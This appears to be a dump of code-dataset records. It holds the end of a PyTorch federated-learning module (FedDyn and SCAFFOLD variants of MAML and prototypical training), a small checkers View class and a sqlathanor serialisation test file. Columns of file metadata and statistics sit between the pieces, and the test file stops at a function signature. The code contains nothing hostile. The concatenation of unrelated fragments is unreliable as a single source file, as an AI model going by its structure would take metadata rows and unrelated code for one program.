    return model
# ###
def train_dyn_meta_model_MAML(alpha, lambda_model, server_model, model_func, model, trn_x, trn_y, num_grad_step, meta_learning_rate, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
    """MAML training (via `higher`) combined with the FedDyn penalty.

    Same inner/outer structure as train_meta_model_MAML, but the query loss
    is augmented with -<w, lambda> - alpha*<w, w_server> + (alpha/2)*||w||^2
    over the flattened meta-parameters w. Returns the frozen, eval-mode model.
    """
    n_trn = trn_x.shape[0]
    trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
                                           batch_size=batch_size, shuffle=True, num_workers=num_workers)
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    model.train(); model = model.to(device)
    n_par = len(get_mdl_params([model])[0])
    optimizer_ = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
    inner_opt = torch.optim.SGD(model.parameters(), lr=meta_learning_rate, weight_decay=weight_decay)
    if print_per != 0:
        loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
        print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, Higher Library, alpha %f" %(0, acc_trn, loss_trn, alpha))
        model.train()
    for k in range(K):
        # Draw two batches: data_list[0] = support set, data_list[1] = query set
        data_list = []
        while len(data_list) != 2:
            for data in trn_load:
                data_list.append([data[0], data[1]])
                if len(data_list) == 2:
                    break
        curr_trn_x, curr_trn_y = data_list[0][0].to(device), data_list[0][1].to(device)
        curr_val_x, curr_val_y = data_list[1][0].to(device), data_list[1][1].to(device)
        # Higher library
        optimizer_.zero_grad()
        with torch.backends.cudnn.flags(enabled=False):
            with higher.innerloop_ctx(model, inner_opt, copy_initial_weights=False) as (fnet, diffopt):
                # Adapt a functional copy of the model on the support batch;
                # higher keeps differentiable copies of the updated weights.
                for _ in range(num_grad_step):
                    trn_logits = fnet(curr_trn_x)
                    trn_loss = loss_fn(trn_logits, curr_trn_y.reshape(-1).long()) / list(curr_trn_y.size())[0]
                    diffopt.step(trn_loss)
                # Query loss of the adapted parameters
                val_logits = fnet(curr_val_x)
                val_loss = loss_fn(val_logits, curr_val_y.reshape(-1).long()) / list(curr_val_y.size())[0]
                # FedDyn version!
                # Add the dynamic penalty on the flattened meta-parameters
                mld_pars = []
                for name, param in model.named_parameters():
                    mld_pars.append(param.reshape(-1))
                mld_pars = torch.cat(mld_pars)
                loss_lambda = -torch.sum(mld_pars * lambda_model)
                loss_server = -alpha*torch.sum(mld_pars * server_model) + alpha/2 * torch.sum(mld_pars*mld_pars)
                val_loss = val_loss + loss_lambda + loss_server
                # Backward unrolls through the inner gradient steps
                val_loss.backward()
        torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
        optimizer_.step()
        if print_per != 0 and ((k+1) % print_per == 0):
            loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
            print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, alpha %f"
                  %((k+1), acc_trn, loss_trn, alpha))
            model.train()
    # Freeze model
    for params in model.parameters():
        params.requires_grad = False
    model.eval()
    return model
def train_dyn_proto_model(alpha, lambda_model, server_model, model, trn_x, trn_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
    """Prototypical-network training combined with the FedDyn penalty.

    Same support/query step as train_proto_model; the query loss is augmented
    with -<w, lambda> - alpha*<w, w_server> + (alpha/2)*||w||^2 over the
    flattened weights w. Returns the model with model.proto reset to False.
    """
    n_trn = trn_x.shape[0]
    # Get one hot vectors for the labels
    unique, unique_indices = np.unique(trn_y.reshape(-1), return_inverse=True)
    trn_y_one_hot = np.zeros((n_trn, np.max(unique_indices) + 1))
    trn_y_one_hot[np.arange(n_trn), unique_indices] = 1
    trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y_one_hot, train=True, dataset_name=dataset_name),
                                           batch_size=batch_size, shuffle=True, num_workers=num_workers)
    optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
    model.train(); model = model.to(device); model.proto = True
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    k = 0
    while(k < K):
        # Get two batches of data, one as sample and one as query.
        while True:
            data_list = []
            while len(data_list) != 2:
                for data in trn_load:
                    data_list.append([data[0], data[1]])
                    if len(data_list) == 2:
                        break
            # Every query class should have at least one support sample.
            # NOTE(review): labels here are one-hot, so np.unique yields {0, 1}
            # rather than class ids — this check looks vacuous; confirm.
            sampl_cls = np.unique(data_list[0][1]); query_cls = np.unique(data_list[1][1]); is_violated = False
            for elem in query_cls:
                if not elem in sampl_cls:
                    is_violated = True
            if not is_violated:
                break
        # curr_sampl_y is BS x nCls. A class absent from the support batch would
        # make its prototype NaN, so restrict columns to classes actually present.
        curr_sampl_y = data_list[0][1]; curr_query_y = data_list[1][1]
        non_zero_classes = torch.where(torch.sum(curr_sampl_y, 0).reshape(-1,1) != 0)[0]
        curr_sampl_y = curr_sampl_y[:,non_zero_classes].to(device)
        curr_query_y = curr_query_y[:,non_zero_classes].to(device)
        # Concatenate input so both batches share one forward pass
        curr_sampl_x = data_list[0][0].to(device)
        curr_query_x = data_list[1][0].to(device)
        curr_x = torch.cat((curr_sampl_x, curr_query_x), 0)
        feature_ = model(curr_x)
        feature_space_sampl = feature_[:len(curr_sampl_x)]
        feature_space_query = feature_[len(curr_sampl_x):]
        # Query logits are negative squared distances to the support prototypes
        logits_cen = get_logits_proto_cen(feature_space_sampl, curr_sampl_y, feature_space_query)
        # Mean cross-entropy of the query batch
        loss = loss_fn(logits_cen, torch.argmax(curr_query_y, 1).reshape(-1).long()) / list(curr_query_y.size())[0]
        # FedDyn version!
        # Add the dynamic penalty on the flattened weights
        mld_pars = []
        for name, param in model.named_parameters():
            mld_pars.append(param.reshape(-1))
        mld_pars = torch.cat(mld_pars)
        loss_lambda = -torch.sum(mld_pars * lambda_model)
        loss_server = -alpha*torch.sum(mld_pars * server_model) + alpha/2 * torch.sum(mld_pars*mld_pars)
        loss = loss + loss_lambda + loss_server
        optimizer.zero_grad()
        loss.backward()
        torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
        optimizer.step()
        k += 1
        if print_per != 0 and (k % print_per == 0):
            acc = np.mean(np.argmax(logits_cen.detach().cpu().numpy(), axis=1) == np.argmax(curr_query_y.cpu().numpy(), axis=1))
            loss = loss.item()
            print("Step %3d, Batch Acc: %.4f, Loss: %.4f, alpha: %.4f" %(k, acc, loss, alpha))
    model.proto = False
    return model
### SCAFFOLD methods
def train_SCAF_model(curr_state_params_diff, model, trn_x, trn_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
    """Train a client model with the SCAFFOLD correction for K SGD steps.

    curr_state_params_diff: flat tensor added to the loss as <c_diff, w>
    over the flattened weights w (presumably the c - c_i control-variate
    difference — confirm against the caller). Returns the frozen model.
    """
    n_trn = trn_x.shape[0]
    trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
                                           batch_size=batch_size, shuffle=True, num_workers=num_workers)
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
    model.train(); model = model.to(device)
    if print_per != 0:
        loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
        print("Step %3d, Training Accuracy: %.4f, Loss: %.4f" %(0,acc_trn,loss_trn))
        model.train()
    k=0
    while(k < K):
        for data in trn_load:
            batch_x, batch_y = data[0].to(device), data[1].to(device)
            y_pred = model(batch_x)
            optimizer.zero_grad()
            loss = loss_fn(y_pred, batch_y.reshape(-1).long()) / list(batch_y.size())[0]
            # Linear correction term: gradient contribution is curr_state_params_diff
            mld_pars = []
            for name, param in model.named_parameters():
                mld_pars.append(param.reshape(-1))
            mld_pars = torch.cat(mld_pars)
            loss_inner = torch.sum(curr_state_params_diff * mld_pars)
            loss = loss + loss_inner
            loss.backward()
            torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients to prevent exploding
            optimizer.step()
            k += 1
            if print_per != 0 and (k % print_per == 0):
                loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
                print("Step %3d, Training Accuracy: %.4f, Loss: %.4f" %(k,acc_trn,loss_trn))
                model.train()
            if k == K:
                break
    # Freeze model
    for params in model.parameters():
        params.requires_grad = False
    model.eval()
    return model
def train_SCAF_meta_model_MAML(curr_state_params_diff, model_func, model, trn_x, trn_y, num_grad_step, meta_learning_rate, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
    """MAML training (via `higher`) combined with the SCAFFOLD correction.

    Same inner/outer structure as train_meta_model_MAML, but the query loss
    is augmented with <c_diff, w> over the flattened meta-parameters w.
    Returns the frozen, eval-mode model.
    """
    n_trn = trn_x.shape[0]
    trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
                                           batch_size=batch_size, shuffle=True, num_workers=num_workers)
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    model.train(); model = model.to(device)
    n_par = len(get_mdl_params([model])[0])
    optimizer_ = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
    inner_opt = torch.optim.SGD(model.parameters(), lr=meta_learning_rate, weight_decay=weight_decay)
    if print_per != 0:
        loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
        print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, Higher Library" %(0, acc_trn, loss_trn))
        model.train()
    for k in range(K):
        # Draw two batches: data_list[0] = support set, data_list[1] = query set
        data_list = []
        while len(data_list) != 2:
            for data in trn_load:
                data_list.append([data[0], data[1]])
                if len(data_list) == 2:
                    break
        curr_trn_x, curr_trn_y = data_list[0][0].to(device), data_list[0][1].to(device)
        curr_val_x, curr_val_y = data_list[1][0].to(device), data_list[1][1].to(device)
        # Higher library
        optimizer_.zero_grad()
        with torch.backends.cudnn.flags(enabled=False):
            with higher.innerloop_ctx(model, inner_opt, copy_initial_weights=False) as (fnet, diffopt):
                # Adapt a functional copy of the model on the support batch;
                # higher keeps differentiable copies of the updated weights.
                for _ in range(num_grad_step):
                    trn_logits = fnet(curr_trn_x)
                    trn_loss = loss_fn(trn_logits, curr_trn_y.reshape(-1).long()) / list(curr_trn_y.size())[0]
                    diffopt.step(trn_loss)
                # Query loss of the adapted parameters
                val_logits = fnet(curr_val_x)
                val_loss = loss_fn(val_logits, curr_val_y.reshape(-1).long()) / list(curr_val_y.size())[0]
                # SCAFFOLD linear correction on the flattened meta-parameters
                mld_pars = []
                for name, param in model.named_parameters():
                    mld_pars.append(param.reshape(-1))
                mld_pars = torch.cat(mld_pars)
                loss_inner = torch.sum(mld_pars * curr_state_params_diff)
                val_loss = val_loss + loss_inner
                # Backward unrolls through the inner gradient steps
                val_loss.backward()
        torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
        optimizer_.step()
        if print_per != 0 and ((k+1) % print_per == 0):
            loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
            print("Step %3d, Training Accuracy: %.4f, Loss: %.4f"
                  %((k+1), acc_trn, loss_trn))
            model.train()
    # Freeze model
    for params in model.parameters():
        params.requires_grad = False
    model.eval()
    return model
def train_SCAF_proto_model(curr_state_params_diff, model, trn_x, trn_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
    """Prototypical-network training combined with the SCAFFOLD correction.

    Same support/query step as train_proto_model; the query loss is augmented
    with <c_diff, w> over the flattened weights w. Returns the model with
    model.proto reset to False.
    """
    n_trn = trn_x.shape[0]
    # Get one hot vectors for the labels
    unique, unique_indices = np.unique(trn_y.reshape(-1), return_inverse=True)
    trn_y_one_hot = np.zeros((n_trn, np.max(unique_indices) + 1))
    trn_y_one_hot[np.arange(n_trn), unique_indices] = 1
    trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y_one_hot, train=True, dataset_name=dataset_name),
                                           batch_size=batch_size, shuffle=True, num_workers=num_workers)
    optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
    model.train(); model = model.to(device); model.proto = True
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    k = 0
    while(k < K):
        # Get two batches of data, one as sample and one as query.
        while True:
            data_list = []
            while len(data_list) != 2:
                for data in trn_load:
                    data_list.append([data[0], data[1]])
                    if len(data_list) == 2:
                        break
            # Every query class should have at least one support sample.
            # NOTE(review): labels here are one-hot, so np.unique yields {0, 1}
            # rather than class ids — this check looks vacuous; confirm.
            sampl_cls = np.unique(data_list[0][1]); query_cls = np.unique(data_list[1][1]); is_violated = False
            for elem in query_cls:
                if not elem in sampl_cls:
                    is_violated = True
            if not is_violated:
                break
        # curr_sampl_y is BS x nCls. A class absent from the support batch would
        # make its prototype NaN, so restrict columns to classes actually present.
        curr_sampl_y = data_list[0][1]; curr_query_y = data_list[1][1]
        non_zero_classes = torch.where(torch.sum(curr_sampl_y, 0).reshape(-1,1) != 0)[0]
        curr_sampl_y = curr_sampl_y[:,non_zero_classes].to(device)
        curr_query_y = curr_query_y[:,non_zero_classes].to(device)
        # Concatenate input so both batches share one forward pass
        curr_sampl_x = data_list[0][0].to(device)
        curr_query_x = data_list[1][0].to(device)
        curr_x = torch.cat((curr_sampl_x, curr_query_x), 0)
        feature_ = model(curr_x)
        feature_space_sampl = feature_[:len(curr_sampl_x)]
        feature_space_query = feature_[len(curr_sampl_x):]
        # Query logits are negative squared distances to the support prototypes
        logits_cen = get_logits_proto_cen(feature_space_sampl, curr_sampl_y, feature_space_query)
        # Mean cross-entropy of the query batch
        loss = loss_fn(logits_cen, torch.argmax(curr_query_y, 1).reshape(-1).long()) / list(curr_query_y.size())[0]
        # SCAFFOLD linear correction on the flattened weights
        mld_pars = []
        for name, param in model.named_parameters():
            mld_pars.append(param.reshape(-1))
        mld_pars = torch.cat(mld_pars)
        loss_inner = torch.sum(mld_pars * curr_state_params_diff)
        loss = loss + loss_inner
        optimizer.zero_grad()
        loss.backward()
        torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
        optimizer.step()
        k += 1
        if print_per != 0 and (k % print_per == 0):
            acc = np.mean(np.argmax(logits_cen.detach().cpu().numpy(), axis=1) == np.argmax(curr_query_y.cpu().numpy(), axis=1))
            loss = loss.item()
            # NOTE(review): prints (k+1) although k was already incremented —
            # siblings (train_proto_model, train_dyn_proto_model) print k; confirm.
            print("Step %3d, Batch Acc: %.4f, Loss %.4f" %((k+1), acc, loss))
    model.proto = False
    return model
| 51.399773
| 202
| 0.6231
| 6,755
| 45,386
| 3.876536
| 0.050481
| 0.032346
| 0.009356
| 0.009776
| 0.891889
| 0.87352
| 0.852784
| 0.837089
| 0.828611
| 0.818033
| 0
| 0.019192
| 0.265258
| 45,386
| 883
| 203
| 51.399774
| 0.766066
| 0.097078
| 0
| 0.734277
| 0
| 0.023585
| 0.051604
| 0
| 0
| 0
| 0
| 0
| 0.003145
| 1
| 0.036164
| false
| 0
| 0.004717
| 0
| 0.078616
| 0.092767
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fcf2e11ecc7b28679ba07a7cea3aeef3bc9cc8ee
| 159
|
py
|
Python
|
View.py
|
binary-b/python-checkers
|
6d48c74f45599f8ec166023ec731378a49e1ea67
|
[
"MIT"
] | null | null | null |
View.py
|
binary-b/python-checkers
|
6d48c74f45599f8ec166023ec731378a49e1ea67
|
[
"MIT"
] | null | null | null |
View.py
|
binary-b/python-checkers
|
6d48c74f45599f8ec166023ec731378a49e1ea67
|
[
"MIT"
] | null | null | null |
class View:
    """Minimal view interface: every hook is a no-op for subclasses to override."""
    def __init__ (self):
        pass
    def update (self):
        # Per-tick state-update hook; no-op by default.
        pass
    def draw (self):
        # Rendering hook; no-op by default.
        pass
    def event (self, ev):
        # Input-event hook; `ev` is presumably a pygame-style event — confirm at call site.
        pass
| 15.9
| 25
| 0.490566
| 19
| 159
| 3.894737
| 0.526316
| 0.324324
| 0.445946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.421384
| 159
| 9
| 26
| 17.666667
| 0.804348
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0.444444
| 0
| 0
| 0.555556
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
1e3dfe8521c91872931d9dc80392253be960a4cd
| 36,775
|
py
|
Python
|
tests/test_dict_support.py
|
edupo/sqlathanor
|
a5cfd349d092b25a3ffb3950b996b13878e1db17
|
[
"MIT"
] | 101
|
2018-07-21T00:20:59.000Z
|
2022-02-09T21:33:09.000Z
|
tests/test_dict_support.py
|
edupo/sqlathanor
|
a5cfd349d092b25a3ffb3950b996b13878e1db17
|
[
"MIT"
] | 85
|
2018-06-16T02:15:08.000Z
|
2022-02-24T14:57:24.000Z
|
tests/test_dict_support.py
|
edupo/sqlathanor
|
a5cfd349d092b25a3ffb3950b996b13878e1db17
|
[
"MIT"
] | 6
|
2018-07-25T09:51:02.000Z
|
2022-02-24T14:04:27.000Z
|
# -*- coding: utf-8 -*-
"""
******************************************
tests.test_dict_support
******************************************
Tests for :class:`dict <python:dict>` serialization/de-serialization support.
"""
# pylint: disable=line-too-long,protected-access
import pytest
import datetime
from validator_collection import checkers
from tests.fixtures import db_engine, tables, base_model, db_session, \
model_single_pk, instance_single_pk, model_complex_postgresql, instance_postgresql
from sqlathanor.errors import CSVStructureError, DeserializationError, \
MaximumNestingExceededError, MaximumNestingExceededWarning, \
SerializableAttributeError, InvalidFormatError, ValueSerializationError, \
ValueDeserializationError, DeserializableAttributeError, DeserializationError, \
ExtraKeyError
from sqlathanor.utilities import are_dicts_equivalent
@pytest.mark.parametrize('supports_serialization, hybrid_value, format, max_nesting, current_nesting, expected_result, warning, error', [
(False, None, 'invalid', 0, 0, None, None, InvalidFormatError),
(False, None, 'dict', 0, 0, None, None, SerializableAttributeError),
(False, None, 'json', 0, 0, None, None, SerializableAttributeError),
(False, None, 'yaml', 0, 0, None, None, SerializableAttributeError),
(False, None, 'csv', 0, 0, None, None, SerializableAttributeError),
(False, None, 'dict', 0, 3, None, None, MaximumNestingExceededError),
(False, None, 'json', 0, 3, None, None, MaximumNestingExceededError),
(False, None, 'yaml', 0, 3, None, None, MaximumNestingExceededError),
(False, None, 'csv', 0, 3, None, None, MaximumNestingExceededError),
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': 'test value' }, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': 'test value' }, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': 'test value' }, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'serialized', 'smallint_column': 2, 'hybrid_value': 'test value', 'time_delta': 86400.0 }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 0, 0, { 'id': 1, 'name': 'serialized', 'smallint_column': 2 }, None, ValueSerializationError),
(True, [{ 'nested_key': 'test', 'nested_key2': 'test2' }], 'dict', 1, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': [{ 'nested_key': 'test', 'nested_key2': 'test2' }] }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 1, 0, { 'id': 1, 'name': 'serialized', 'addresses': [], 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 1, 0, { 'id': 1, 'name': 'serialized', 'addresses': [], 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 1, 0, { 'id': 1, 'name': 'serialized', 'smallint_column': 2, 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, ValueSerializationError),
(True, { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' } }, None, None),
(True, { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' } }, None, None),
])
def test__to_dict(request,
                  instance_single_pk,
                  instance_postgresql,
                  supports_serialization,
                  hybrid_value,
                  format,
                  max_nesting,
                  current_nesting,
                  expected_result,
                  warning,
                  error):
    """Test ``_to_dict()`` across formats, nesting limits, and failure modes.

    The parametrization drives three mutually-exclusive outcomes: a clean
    serialization (compared key-by-key against ``expected_result``), an
    expected exception, or an expected warning followed by the comparison.
    """
    # The postgresql fixture has serializable attributes; the single-pk
    # fixture does not, which is what the failure cases rely on.
    if supports_serialization:
        target = instance_postgresql[0][0]
    else:
        target = instance_single_pk[0]
    target.hybrid = hybrid_value

    def serialize():
        # Single call site for the method under test.
        return target._to_dict(format,
                               max_nesting = max_nesting,
                               current_nesting = current_nesting)

    def assert_matches(actual):
        # The produced dict and the expectation must agree in both directions.
        assert isinstance(actual, dict)
        for item in actual:
            assert item in expected_result
            assert expected_result[item] == actual[item]
        for item in expected_result:
            assert item in actual
            assert actual[item] == expected_result[item]
        assert are_dicts_equivalent(actual, expected_result) is True

    if error is None and warning is None:
        result = serialize()
        assert isinstance(result, dict)
        print('RESULT:')
        print(result)
        print('\nEXPECTED:')
        print(expected_result)
        assert_matches(result)
    elif warning is None:
        with pytest.raises(error):
            serialize()
    elif error is None:
        with pytest.warns(warning):
            result = serialize()
        assert_matches(result)
@pytest.mark.parametrize('supports_serialization, hybrid_value, format, max_nesting, current_nesting, expected_result, extra_keys, error_on_extra_keys, drop_extra_keys, warning, error', [
(False, None, 'invalid', 0, 0, None, None, True, False, None, InvalidFormatError),
(False, None, 'dict', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'json', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'yaml', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'csv', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, None, True, False, None, ValueSerializationError),
(True, [{ 'nested_key': 'test', 'nested_key2': 'test2' }], 'dict', 1, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': [{ 'nested_key': 'test', 'nested_key2': 'test2' }] }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 1, 0, { 'id': 1, 'name': 'deserialized', 'addresses': [], 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 1, 0, { 'id': 1, 'name': 'deserialized', 'addresses': [], 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 1, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' }, 'time_delta': datetime.timedelta(1) }, None, True, False, None, ValueSerializationError),
(True, { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' } }, None, True, False, None, None),
# Error on Extra Keys
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, None, ExtraKeyError),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, MaximumNestingExceededWarning, ExtraKeyError),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, MaximumNestingExceededWarning, ExtraKeyError),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, True, False, None, ExtraKeyError),
# Include Extra Keys in result
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'extra': 'test', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, False, False, None, None),
# Exclude Extra Keys from result
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, False, True, None, None),
])
def test_model__parse_dict(request,
                           model_single_pk,
                           model_complex_postgresql,
                           instance_single_pk,
                           instance_postgresql,
                           supports_serialization,
                           hybrid_value,
                           format,
                           max_nesting,
                           current_nesting,
                           extra_keys,
                           error_on_extra_keys,
                           drop_extra_keys,
                           expected_result,
                           warning,
                           error):
